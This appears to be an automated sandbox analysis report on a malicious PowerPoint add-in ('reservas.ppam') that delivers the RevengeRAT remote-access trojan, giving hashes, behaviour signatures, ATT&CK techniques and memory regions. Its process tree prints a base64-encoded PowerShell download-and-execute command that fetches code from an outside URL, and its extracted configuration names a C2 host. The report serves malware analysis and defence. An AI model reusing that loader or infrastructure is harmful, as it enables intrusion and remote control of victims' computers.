Analysis

  • max time kernel
    142s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-02-2024 08:47

General

  • Target

    reservas.ppam

  • Size

    16KB

  • MD5

    5e6c2b4b6bae7269c8127ae4368f0178

  • SHA1

    29299b7437a5225885af5c152c17955adba89511

  • SHA256

    b402239273ce6dbd40ac5087661d66176092a6f848fd521eea1ed2ad6012672c

  • SHA512

    fbf55d29917b5610ed0e95ba6bd7bad6beb08dd5eecb1c71848746fa387e30e2b9b2f0b952517249d9b2092d526fc8c7eb288a398b4319069529f94c69c6e71a

  • SSDEEP

    384:dXPz8GKfDSmH+V6WMxj7mV+ZOA9B0+6lZFUADrbA:VPoGKbSmHYCZOuB0+6vHY

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

brasil.ddns.com.br:333

Mutex

5e241e476b334640a2f

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\reservas.ppam" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2748
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAuAEkAbgB2AG8AawBlACgAJwANAAoAaAB0AHQAcABzADoALwAvAGYAaQByAGUAYgBhAHMAZQBzAHQAbwByAGEAZwBlAC4AZwBvAG8AZwBsAGUAYQBwAGkAcwAuAGMAbwBtAC8AdgAwAC8AYgAvAG0AYQBzAHQAZQByAC0AMgA3ADEAYgA4AC4AYQBwAHAAcwBwAG8AdAAuAGMAbwBtAC8AbwAvAGMAbABpAGUAbgB0AHgAeAB4AHgAeAB4AHgAeAB4AC4AagBwAGcAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9AGQAMQA1ADQAZgBmADcAZAAtAGYAMgAyADYALQA0ADgAZAAwAC0AYQA5AGQANwAtADEAMgAwADAANwA2ADQAYwBhAGIANABlAA0ACgAnACkAOwAgAA0ACgByAGUARQBhAFoAYQBIAEIAYQBGAHAAZABSAFEAUQB0AHYASQBoAHoAYQBuAEEATABPAGIAYgBCAHAAVgBUAE8ARABRAGUAdwBXAEIATQBZAGMAQgBKAGkASQBTAHoASwBKAEkAeQB0AHYAcABSAEMASwB0AHUAWQBCAGgAbwBHAGkAQgBIAGEATABGAEEAUgBXAGsAVwANAAoA""
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1232
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Checks processor information in registry
        PID:1788

Network

MITRE ATT&CK Matrix ATT&CK v13

Discovery

Query Registry

3
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g0035ivw.t0a.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1232-61-0x0000016F65A00000-0x0000016F65A10000-memory.dmp
    Filesize

    64KB

  • memory/1232-60-0x0000016F65A00000-0x0000016F65A10000-memory.dmp
    Filesize

    64KB

  • memory/1232-86-0x0000016F66080000-0x0000016F66098000-memory.dmp
    Filesize

    96KB

  • memory/1232-84-0x0000016F66080000-0x0000016F66098000-memory.dmp
    Filesize

    96KB

  • memory/1232-76-0x0000016F66080000-0x0000016F66098000-memory.dmp
    Filesize

    96KB

  • memory/1232-78-0x0000016F66080000-0x0000016F66098000-memory.dmp
    Filesize

    96KB

  • memory/1232-80-0x0000016F66080000-0x0000016F66098000-memory.dmp
    Filesize

    96KB

  • memory/1232-91-0x00007FFCB25E0000-0x00007FFCB30A1000-memory.dmp
    Filesize

    10.8MB

  • memory/1232-62-0x0000016F65A00000-0x0000016F65A10000-memory.dmp
    Filesize

    64KB

  • memory/1232-82-0x0000016F66080000-0x0000016F66098000-memory.dmp
    Filesize

    96KB

  • memory/1232-74-0x0000016F66080000-0x0000016F660A0000-memory.dmp
    Filesize

    128KB

  • memory/1232-75-0x0000016F66080000-0x0000016F66098000-memory.dmp
    Filesize

    96KB

  • memory/1232-87-0x0000016F660A0000-0x0000016F660A1000-memory.dmp
    Filesize

    4KB

  • memory/1232-59-0x00007FFCB25E0000-0x00007FFCB30A1000-memory.dmp
    Filesize

    10.8MB

  • memory/1232-58-0x0000016F65CC0000-0x0000016F65CE2000-memory.dmp
    Filesize

    136KB

  • memory/1788-98-0x0000000004FA0000-0x0000000004FB0000-memory.dmp
    Filesize

    64KB

  • memory/1788-97-0x0000000074CB0000-0x0000000075460000-memory.dmp
    Filesize

    7.7MB

  • memory/1788-96-0x0000000005320000-0x0000000005386000-memory.dmp
    Filesize

    408KB

  • memory/1788-88-0x0000000000400000-0x000000000040A000-memory.dmp
    Filesize

    40KB

  • memory/1788-92-0x0000000074CB0000-0x0000000075460000-memory.dmp
    Filesize

    7.7MB

  • memory/1788-93-0x00000000053D0000-0x0000000005974000-memory.dmp
    Filesize

    5.6MB

  • memory/1788-94-0x0000000004FA0000-0x0000000004FB0000-memory.dmp
    Filesize

    64KB

  • memory/1788-95-0x0000000005980000-0x0000000005A1C000-memory.dmp
    Filesize

    624KB

  • memory/2748-10-0x00007FFC9D240000-0x00007FFC9D250000-memory.dmp
    Filesize

    64KB

  • memory/2748-73-0x00007FFCDF790000-0x00007FFCDF985000-memory.dmp
    Filesize

    2.0MB

  • memory/2748-72-0x00007FFC9F810000-0x00007FFC9F820000-memory.dmp
    Filesize

    64KB

  • memory/2748-71-0x00007FFC9F810000-0x00007FFC9F820000-memory.dmp
    Filesize

    64KB

  • memory/2748-70-0x00007FFC9F810000-0x00007FFC9F820000-memory.dmp
    Filesize

    64KB

  • memory/2748-69-0x00007FFC9F810000-0x00007FFC9F820000-memory.dmp
    Filesize

    64KB

  • memory/2748-45-0x000002C484150000-0x000002C484950000-memory.dmp
    Filesize

    8.0MB

  • memory/2748-44-0x00007FFCDF790000-0x00007FFCDF985000-memory.dmp
    Filesize

    2.0MB

  • memory/2748-28-0x000002C484150000-0x000002C484950000-memory.dmp
    Filesize

    8.0MB

  • memory/2748-0-0x00007FFC9F810000-0x00007FFC9F820000-memory.dmp
    Filesize

    64KB

  • memory/2748-9-0x00007FFC9D240000-0x00007FFC9D250000-memory.dmp
    Filesize

    64KB

  • memory/2748-8-0x00007FFCDF790000-0x00007FFCDF985000-memory.dmp
    Filesize

    2.0MB

  • memory/2748-7-0x00007FFCDF790000-0x00007FFCDF985000-memory.dmp
    Filesize

    2.0MB

  • memory/2748-6-0x00007FFC9F810000-0x00007FFC9F820000-memory.dmp
    Filesize

    64KB

  • memory/2748-5-0x00007FFCDF790000-0x00007FFCDF985000-memory.dmp
    Filesize

    2.0MB

  • memory/2748-3-0x00007FFC9F810000-0x00007FFC9F820000-memory.dmp
    Filesize

    64KB

  • memory/2748-4-0x00007FFCDF790000-0x00007FFCDF985000-memory.dmp
    Filesize

    2.0MB

  • memory/2748-2-0x00007FFC9F810000-0x00007FFC9F820000-memory.dmp
    Filesize

    64KB

  • memory/2748-1-0x00007FFC9F810000-0x00007FFC9F820000-memory.dmp
    Filesize

    64KB